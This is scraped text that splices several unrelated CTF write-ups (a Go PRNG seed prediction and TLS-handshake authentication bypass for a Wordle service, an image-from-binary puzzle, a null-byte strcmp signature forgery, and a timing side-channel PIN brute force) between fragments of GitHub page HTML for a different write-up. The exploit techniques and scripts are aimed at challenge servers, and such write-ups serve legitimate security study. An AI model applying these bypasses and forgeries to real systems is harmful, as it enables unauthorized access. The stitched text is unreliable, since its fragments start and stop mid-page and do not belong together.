js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
## Level 2 To get to level 2, we first have to pass level 1. The level 1 however is just a normal wordle game. Although the word list is larger than the standard wordle game, it's easy to pass with existing online tools and by hand. Reading the logic of the second game, it is generating a string of 5 emojis at random each time at the start of a new game. The emojis are chosen from a fixed list of 236 emojis, meaning there are $236^5\approx 7.3 \times 10^{11}$ possible combinations. We have 6 times of guess, which is clearly not enough for guessing even with an algorithm, or we have to get really lucky. Looking more into the code, we see that the randomzation part of chooing emojis is done by Go's builtin `math/rand` library. We then look for the potential of a pRNG hack. If this path is correct, we need to know two things: what is the seed of the pRNG and where we are in the random number stream. We found that at the start of the server, the current time in miliseconds in Unix timestamp will be chosen as the seed for the pRNG. So the question becomes how we can get the start time of the server. The obvious answer is to crash the server, or to ask for a server restart. The former seems to be against the rules, the later is rejected by the admin. After some more digging, we finally realize that the server's TLS cert is generated at the server start time as well, and the code will choose that time as the cert's `NotBefore` field. Knowing this, we are able to use the server's cert as an accurate indicator of the server start time. However, after seeing the actual value, we realize that `NotBefore` field is only down to the seconds, that means we have probably $\pm 1000$ miliseconds of range we need to try, due to rounding and delay between two pieces of code. The second piece of the puzzle, knowing where we are in the random number stream, is rather easy. Level 1 also uses the same pRNG to generate target words, but we know level 1 is solvable and we have the word list, so we are able to know exactly which random number (mod list size) was generated. Take everything together: we need to query level 1 multiple times to get some consecutive random numbers, then brute-force the possible seeds to get a sequence of random numbers. We then compare each sequence with the acquired random numbers generated by the server, and whichever sequence contains the list of acquired random numbers is the correct sequence, and we are able to know what random numbers will come next. A few details:1. We need to query level 1 multiple times consecutively, meaning we need a automatic wordle solver. We used [ammario/wordle-solver](https://github.com/ammario/wordle-solver) which is written in Go and supports custom words list.2. However, the solver cannot solve with 100% success rate, and there might be other teams solving at the same time. That means the random numbers we get are not necessarily consecutively generated by the pRNG.3. That means our matching algorithm should not be a simple range matching, but need to match the sub-list non-consecutively. Finally we chose to query 10 times and match it against a stream of 10,000 numbers for each seed. We are able to successfully get the seed and solve level 2 using only one guess. **Psuedocode:**```pythonwordMap = word -> indexconn = dial(server)t = UnixMilli(conn.TLS.Cert.NotBefore)rngs = []for 10 times: answer = guess level 1 until correct rng = wordMap[answer] rngs.append(rng) for seed : t - 1000 ... t + 1000: prng = fromSeed(seed) rngsCopy = copy(rngs) for 10000 times: if rngsCopy is empty: break rng = prng.randN(len(wordMap)) if rng == rngsCopy[0]: rngsCopy.popFront() if rngsCopy is empty: break # prng is aligned with the server emojis = []for 5 times: emojis.append(emojiList[prngs.getN(len(emojiList))])guess level 2 with emojis # profit``` ## Level 4 We were unable to solve this during the CTF, but with the hint later on that level 3 is unsolvable, we quickly turned to other places and found where the bug is. The bug is a combination of two Go's quirk:- non-blocking channel in `select` with a `default` path- TLS library accepting connection before handshake completes The former is referring to `server/level_server.go:129`. Normally the channel will block the receving side if no one's sending anything on the otherside (or there's nothing in channel for a buffered channel). In this case, the function `sessionSearch` is waiting for an input from the channel `connErr`, but it is in a select with a `default` path. That makes the `connErr` not actually blocking if there's no goroutine sending to the channel, but instead enter the `default` execution path (like how a `default` behave in a `switch`). Then if we look back at which part of the code should send stuff to `connErr` channel, we see the function `feedbackWriter`. The first thing this function does is to write to the connection `conn`, and if the write fails it will send the error to `connErr` channel. This is where the second quirk comes to play: if we look at the implementation of `net.Conn.Write()` by `crypto/tls` library's `*tls.Conn.Write()`, the first line we see is that it will call `*tls.Conn.Handshake()`. This function essential "completes" the handshake in a blocking way, meaning if the handshake is not complete, it will subsequently block the write as well. Therefore, we could block `feedbackWriter` by not completing the TLS handshake on the client side, and thus making `sessionSearch` choosing the default path and pass the check. There are multiple ways of blocking the TLS handshake, like simply not sending anything after `ServerHello`. The easier way is to block using `tls.Config.GetClientCertificate`, which will be called when the server's requesting client cert: ```gotls.Dial("tcp", "pppordle.chal.pwni.ng:1341", &tls.Config{ GetClientCertificate: func(info *tls.CertificateRequestInfo) (*tls.Certificate, error) { time.Sleep(3 * time.Second) return nil, errors.New("just nope") }, ...})``` After that, we can connect to level 4 without actual authentication. Level 4 is quite easy to solve because the flag (wordle target) is fixed. All we need to do is to enumerate all possible characters and record the ones that are correct. --- Edit Jun 15, 2022: `feedbackWriter` calls `Write()` instead of `Read()`. Thanks to @dumpx86.
## Swarm Mind> My brother went to NullCon and all I got was this lousy number.He was supposed to bring me a picture of the flag. So let me shout out to the Swarm. Maybe they can help. ### The solution Convert the number to binary, paste it in an editor with line-wrap enabled and play around with the window size until you see the flag show up. - The first line of thought we followed for solving this challenge was that the number might be the raw binary data of a picture.- We interpreted the number as raw bytes (we converted it to hex first, then we used [this website](https://tomeko.net/online_tools/hex_to_file.php?lang=en) to get back a file with the raw hex data in it). We analyzed the file using `file` and `binwalk` and we found out that it was of no known file format.- We then used [CyberChef](https://gchq.github.io/CyberChef/) to check for the file entropy. We noticed that _the entropy was lower than what we would expect from a compressed image (such as a jpg or png image)_. This meant that either the data was of an uncompressed image, or it was something different.- Here the name of the challenge threw us off: we thought that "swarm" might refer to a swarm of insects/birds in $2D$ / $3D$ space, and we tried interpreting each pair/triple of bytes as $x$, $y$ / $x$, $y$, $z$ coordinates. Sadly, we found out that _the number of bytes was odd and not divisible by three_. We figured out this was a dead end.- Since the number of bytes was not divisible by three, we assumed that the file did not contain data in `rgb` triples. We then made the assumption that _each byte represented the brightness of a pixel in the final image_.- From this point on, we went back to working with the number converted in hex form. The reasoning behind this was that if our assumption were correct, we should have been able to see some recognizable patterns in the hex data.- We pasted the hex number in a text editor with line wraps enabled, and we actually did notice some patterns form: ![](https://wiki.fuo.fi/ctf/nullcon-2022/swarm-mind/img_1.png) - There was a suspicious amount of `0xff` groups in the hex number, and they appeared to arrange in columns. We played a lot with the window size and aspect ratio, but we couldn't read any clear text, even though we observed some artifacts that looked _very similar_ to actual letters.- In the end, we thought that maybe the brightness of each pixel was not in the range $[0, 255]$, but rather either $1$ or $0$. We then converted the number to binary, played around with the line length, and we finally got the image we sought: ![](https://wiki.fuo.fi/ctf/nullcon-2022/swarm-mind/img_2.png) > Also, please note that we used a _vertical, ultrawide 4k monitor_ to display the flag correctly.
## Magic Words> Give me a sign for the magic words and the flag is yours. ### What's going on?This service is using [gmp](https://gmplib.org/), a library for arbitrary precision arithmetic in C. A brief code explanation:1) The _target_ string is created by appending _magic words_ in a random order.2) We're told that string and asked for its signature.3) A simple modular exponentiation is performed ($m \equiv sig^3 \pmod n$)4) _m_ is converted to a string and compared against our previous _target_ string using strcmp. If 0 is returned we get the flag. Aside from the main, there's just a single function that converts an integer to a string (a sequence of bytes to be honest).If you're familiar with PyCyptodome, it works like [Crypto.Util.number.long_to_bytes](https://pycryptodome.readthedocs.io/en/latest/src/util/util.html#Crypto.Util.number.long_to_bytes).```cchar* int_to_str(mpz_t n) { int len = (int)mpz_sizeinbase(n, 256); char* res = malloc(len + 1); mpz_export(res, NULL, 1, 1, 0, 0, n); return res;}``` In plain python it would be something along the lines of```pythondef int_to_str(n: int) -> str: s = '' while n > 0: s = chr(n & 0xFF) + s n = n >> 8 return s``` ### The solutionObviously the first idea that came to my mind was to find a number _sig_ such that $sig^3 \pmod{n} \equiv$ `str_to_int(target)`, but I'm not a math guy, so I don't know if there's an algorithm for the modular cube root or something + if there is one I guess it would be computationally hard. Then I noticed that _n_ was really big (4096 bits), especially when compared to the _target_ (whose max size could be 96 bytes so 768 bits). If the _target_ happened to be a perfect cube, I could've just computed it's _normal_ cube root but there were $12^{12}$ possible combinations and in my tests it never happened. Then I found out that `strcmp("owo\0asd", "owo")` returns 0 (which really makes sense...) which made me think that I could try finding a perfect cube whose string representation was in the form `target + \0 + random bytes`. This is the script I came up with: ```pythonfrom Crypto.Util.number import long_to_bytes, bytes_to_longfrom sage.all_cmdline import * target = b'ham wuap pteng holy ham spam mene ene ene pteng egg moo egg -- give me the flag!'target += b'\x00' for i in range(200): near_perfect_cube = bytes_to_long(target + b'\x00'*i) root = RealNumber(near_perfect_cube).nth_root(3).round() perfect_cube = pow(root, 3) if long_to_bytes(perfect_cube).startswith(target): print(root) break ```I'm essentially trying to "handcraft" a large enough number (whose associated string starts with `target + \0`) so that a _small_ change in it's least significant bits (the cube root -> rounding -> cube process) only affects the string to the right of the null byte.
This one can be done in a more automatic way, but we can spend our _time_ on writing the tool for solving or spend it on doing it by hand. Program runs like this: ```console[user@host SideChannel]$ ./pin_checker Please enter your 8-digit PIN code:123456788Checking PIN...Access denied.``` but we want to run it in batch mode via pipe: ```console[user@host SideChannel]$ echo 12345678 | ./pin_checker Please enter your 8-digit PIN code: 8Checking PIN...Access denied.``` And one more thing, we want to use the *time* command as well, to see it the execution time will be different on different input: ```console[user@host SideChannel]$ echo 11111111 | time ./pin_checker Please enter your 8-digit PIN code:8Checking PIN...Access denied.Command exited with non-zero status 10.13user 0.00system 0:00.14elapsed 100%CPU (0avgtext+0avgdata 6140maxresident)k0inputs+0outputs (0major+143minor)pagefaults 0swaps[user@host SideChannel]$ echo 21111111 | time ./pin_checker Please enter your 8-digit PIN code:8Checking PIN...Access denied.Command exited with non-zero status 10.15user 0.00system 0:00.15elapsed 99%CPU (0avgtext+0avgdata 6104maxresident)k0inputs+0outputs (1major+144minor)pagefaults 0swaps[user@host SideChannel]$ echo 31111111 | time ./pin_checker Please enter your 8-digit PIN code:8Checking PIN...Access denied.Command exited with non-zero status 10.16user 0.00system 0:00.16elapsed 99%CPU (0avgtext+0avgdata 6076maxresident)k0inputs+0outputs (0major+141minor)pagefaults 0swaps[user@host SideChannel]$ echo 41111111 | time ./pin_checker Please enter your 8-digit PIN code:8Checking PIN...Access denied.Command exited with non-zero status 10.26user 0.00system 0:00.26elapsed 99%CPU (0avgtext+0avgdata 6124maxresident)k0inputs+0outputs (0major+143minor)pagefaults 0swaps``` We can see that the user time is higher for the number **4** in the first positon, that shows us, that this part is correct. 7 more digits to go... But as the time is significantly higher, we do not have to test every digit from 0 to 9 every time, just till the time will show us what we want. In the end it looks like: ```console[user@host SideChannel]$ echo 48390513 | time ./pin_checker Please enter your 8-digit PIN code:8Checking PIN...Access granted. You may use your PIN to log into the master server.``` Last step is to get the flag from the server via the correct pin. It takes a bit of patience, but it's really simple
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/wiki-b72b6de22521.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wiki-1423a5c9ebf5.js"></script> <title>Space Heroes CTF : Off The Grid · not1cyyy/CTF-Writeups Wiki · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/wiki/:id(.:format)"> <meta name="current-catalog-service-hash" content="27690012a2eb28b75d0bacab0f2c11870266e8db9e019fa71fea812b82397bd6"> <meta name="request-id" content="8179:F966:13E52CA:1466920:64121B97" data-pjax-transient="true"/><meta name="html-safe-nonce" content="9c2832056660bedc13763dadf04aa816678e3124662bb4a60c477aabdf2d56c9" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4MTc5OkY5NjY6MTNFNTJDQToxNDY2OTIwOjY0MTIxQjk3IiwidmlzaXRvcl9pZCI6IjgwODA5MjIzNTk5NzkxODcwOTQiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="42c1a6846d33a3cf2272b159f7f19cac6dbdf97664f203f0417695819ffd01f6" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:481769760" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository" data-turbo-transient="true" /> <meta name="selected-link" value="repo_wiki" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/wiki/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Space Heroes CTF : Off The Grid" /><meta name="twitter:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta property="og:image:alt" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="Space Heroes CTF : Off The Grid" /><meta property="og:url" content="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Off-The-Grid" /><meta property="og:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="go-import" content="github.com/not1cyyy/CTF-Writeups git https://github.com/not1cyyy/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="101048320" /><meta name="octolytics-dimension-user_login" content="not1cyyy" /><meta name="octolytics-dimension-repository_id" content="481769760" /><meta name="octolytics-dimension-repository_nwo" content="not1cyyy/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="481769760" /><meta name="octolytics-dimension-repository_network_root_nwo" content="not1cyyy/CTF-Writeups" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 